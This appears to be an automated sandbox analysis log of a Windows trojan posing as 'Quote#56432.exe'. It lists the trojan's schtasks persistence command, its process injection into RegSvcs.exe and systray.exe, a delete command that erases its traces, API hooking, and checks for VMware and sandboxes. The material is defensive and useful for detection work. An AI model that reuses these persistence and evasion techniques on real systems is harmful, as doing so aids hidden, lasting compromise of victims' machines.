          Source: Quote#56432.exe, 00000000.00000002.690946204.0000000003C70000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs Quote#56432.exe
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEnvoySinks.dll6 vs Quote#56432.exe
          Source: Quote#56432.exe, 00000000.00000002.689196044.0000000000682000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameRangeWork.exe< vs Quote#56432.exe
          Source: Quote#56432.exeBinary or memory string: OriginalFilenameRangeWork.exe< vs Quote#56432.exe
          Source: Quote#56432.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: ySWmXEgh.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Quote#56432.exeVirustotal: Detection: 29%
          Source: Quote#56432.exeMetadefender: Detection: 28%
          Source: Quote#56432.exeReversingLabs: Detection: 78%
          Source: C:\Users\user\Desktop\Quote#56432.exeFile read: C:\Users\user\Desktop\Quote#56432.exeJump to behavior
          Source: Quote#56432.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Quote#56432.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\Quote#56432.exe 'C:\Users\user\Desktop\Quote#56432.exe'
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ySWmXEgh' /XML 'C:\Users\user\AppData\Local\Temp\tmp994F.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ySWmXEgh' /XML 'C:\Users\user\AppData\Local\Temp\tmp994F.tmp'
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
          Source: C:\Windows\SysWOW64\systray.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Users\user\Desktop\Quote#56432.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\Quote#56432.exeFile created: C:\Users\user\AppData\Roaming\ySWmXEgh.exeJump to behavior
          Source: C:\Users\user\Desktop\Quote#56432.exeFile created: C:\Users\user\AppData\Local\Temp\tmp994F.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/4@2/1
          Source: C:\Users\user\Desktop\Quote#56432.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\Quote#56432.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_01
          Source: C:\Users\user\Desktop\Quote#56432.exeMutant created: \Sessions\1\BaseNamedObjects\VnxmayLwfqlQkqDyHKdqh
          Source: Quote#56432.exe, Cheeeeeeeeese/MainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: ySWmXEgh.exe.0.dr, Cheeeeeeeeese/MainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.0.Quote#56432.exe.680000.0.unpack, Cheeeeeeeeese/MainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: 0.2.Quote#56432.exe.680000.0.unpack, Cheeeeeeeeese/MainForm.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Quote#56432.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Quote#56432.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Quote#56432.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: systray.pdb source: RegSvcs.exe, 00000007.00000002.782499789.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: systray.pdbGCTL source: RegSvcs.exe, 00000007.00000002.782499789.0000000001910000.00000040.00020000.sdmp
          Source: Binary string: RegSvcs.pdb, source: systray.exe, 0000000F.00000002.927302675.0000000004A8F000.00000004.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000007.00000002.784083913.0000000001A3F000.00000040.00000001.sdmp, systray.exe, 0000000F.00000002.926821802.000000000467F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RegSvcs.exe, systray.exe
          Source: Binary string: RegSvcs.pdb source: systray.exe, 0000000F.00000002.927302675.0000000004A8F000.00000004.00020000.sdmp

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: Quote#56432.exe, Cheeeeeeeeese/MainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: ySWmXEgh.exe.0.dr, Cheeeeeeeeese/MainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.0.Quote#56432.exe.680000.0.unpack, Cheeeeeeeeese/MainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 0.2.Quote#56432.exe.680000.0.unpack, Cheeeeeeeeese/MainForm.cs.Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_00685F3D push ss; iretd
          Source: C:\Users\user\Desktop\Quote#56432.exeCode function: 0_2_00687205 push cs; retf
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040E3E2 pushfd ; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0040F6D1 push es; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041DE8F push edi; iretd
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041CEB5 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041CF6C push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041CF02 push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0041CF0B push eax; ret
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0199D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_045DD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0036E3E2 pushfd ; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037CEB5 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037DE8F push edi; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0036F6D1 push es; iretd
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037CF02 push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037CF0B push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037CF6C push eax; ret
          Source: C:\Windows\SysWOW64\systray.exeCode function: 15_2_0037D7CC push ecx; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.67621668489
          Source: initial sampleStatic PE information: section name: .text entropy: 7.67621668489
          Source: C:\Users\user\Desktop\Quote#56432.exeFile created: C:\Users\user\AppData\Roaming\ySWmXEgh.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ySWmXEgh' /XML 'C:\Users\user\AppData\Local\Temp\tmp994F.tmp'

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEC
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\systray.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 0.2.Quote#56432.exe.2b93d5c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Quote#56432.exe PID: 6792, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 00000000003698E4 second address: 00000000003698EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\systray.exeRDTSC instruction interceptor: First address: 0000000000369B5E second address: 0000000000369B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Quote#56432.exe TID: 6800Thread sleep time: -34187s >= -30000s
          Source: C:\Users\user\Desktop\Quote#56432.exe TID: 6828Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exe TID: 5936Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Quote#56432.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Quote#56432.exeThread delayed: delay time: 34187
          Source: C:\Users\user\Desktop\Quote#56432.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000008.00000000.700693239.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000008.00000000.701478438.000000000A897000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}efb8b}
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.732673290.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.700693239.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.738939266.000000000FD12000.00000004.00000001.sdmpBinary or memory string: 6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATAd
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000008.00000000.710195629.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000008.00000000.717907917.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000008.00000000.717907917.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Quote#56432.exe, 00000000.00000002.690221413.0000000002B51000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Quote#56432.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\systray.exeProcess token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01972990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019761A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019D41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01964120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01964120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0196B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0194C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01949080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_0197F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019890AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019720A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019DB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019458EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_019C7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 7_2_01A14015 mov eax, dword ptr fs:[00000030h]
